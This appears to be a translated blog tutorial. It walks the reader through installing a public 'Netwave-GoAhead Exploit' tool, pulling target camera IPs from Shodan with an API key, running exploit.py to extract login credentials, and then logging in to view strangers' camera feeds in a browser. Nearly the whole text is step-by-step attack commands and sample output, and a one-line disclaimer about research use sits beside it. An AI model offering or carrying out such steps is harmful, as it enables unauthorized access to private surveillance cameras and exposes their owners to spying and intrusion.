In the lesson “Exercise: Using ZoomEye to access Cameras with vulnerabilities CVE-2018-9995” we can easily find many cameras that still have unpatched vulnerabilities. However, there is still a Tool called Netwave-GoAhead Exploit that helps find another type of Vulnerable Security Camera.
This tool was created and developed by Kien Quoc. The tool has the main function of finding IP and checking 2 types of Cameras, Netware IP and GoAhead, to see if there are any vulnerabilities. From there hack into the camera and view the camera through your Browser.
Instructions on how to use Netwave-GoAhead Exploit
Note: the article is for research purposes only, it is strictly forbidden to use it for illegal purposes. In case the camera is found to be flawed, please notify the landlord immediately so that it can be quickly remedied.
Step 1: Update your Linux and install Python 3 and Pip 3 for me
sudo apt update
sudo apt install Python3.9.6
(The latest version since this article was published is 3.9.6. You can check it out on Python’s homepage!)
sudo apt-get update
sudo apt-get -y install python3-pip
Step 2: Install Netware-GoAhead Exploit tool
sudo git clone https://github.com/kienquoc102/Netwave-GoAhead-Exploits
Step 3: Go to the file and install the necessary packages
pip3 install -r ./related.txt
Register an account in Shodan.io
Shodan.io is a search engine that allows users to find specific types of computers connected to the internet using various filters. In this article, Shodan acts as an ip finder and filter for you to see which ip can be attacked.
Step 1: Go to Shodan.io here
Step 2: Select SIGN UP NOW
Step 3: Select Register in the upper corner
Step 4: Enter login information
Step 5: Go to email Verify with Shodan.io
Step 6: Go to account.shodan.io here.
Pay attention to the API key
Find Vulnerable Cameras with Shodan API key
Enter the following command
python3 exploit.py -b 2 -v --shodan [nhập cái API key của shodan vào đây]
My example would be
python3 exploit.py -b 2 -v --shodan rrgYhgIMtnrPtfKdiVvWKtyQyY94goA0
It will run as follows
The task you just need to wait when it gives such results
Now I will try to log in to ip address 184.108.40.206 with port 80
It will prompt you to enter your username and password. Just based on what the tool says
An example of this would be
- Username: admin
- Password: 123456
Sometimes you will encounter some cases like this
[+]The ip:192.168.120.1,port:81,username:Location: /admin (Example IP)
[+]The ip:192.168.120.1,port:81,password:<meta name="generator" content="vBulletin 5.5.4" />
For this ip, please help me remove it because it is not the IP Address of the Camera
Access Camera using available IP
With 1 IP address available port
You run yourself the following command
python3 exploit.py -b 1 -i [IP:PORT] -v
For example, I have
python3 exploit.py -b 1 -i 192.168.1.5:80 -v
IP address is 192.168.1.5
Port is 80
With IP list with port
Use the following command for yourself
python3 exploit.py -b 2 -l iplist.txt -v
iplist.txt is the file containing the ip address in the form: [IP:PORT]
Target IP : 192.168.1.5
Port aimed at: 80
For this way, it will be easy to attack on an address that you already know or if you have an IPlist available, using the following way to check is a very effective way. Using Shodan is also possible, but it will check many strange ips that have been published on the network.
So I just finished the tutorial on how to find and attack the camera with the Python tool. If you have a good article, don’t hesitate to send an article contribution via email
firstname.lastname@example.org, we will edit and post. See also: Exercise: Use ZoomEye to find the vulnerable Camera CVE-2018-9995 here.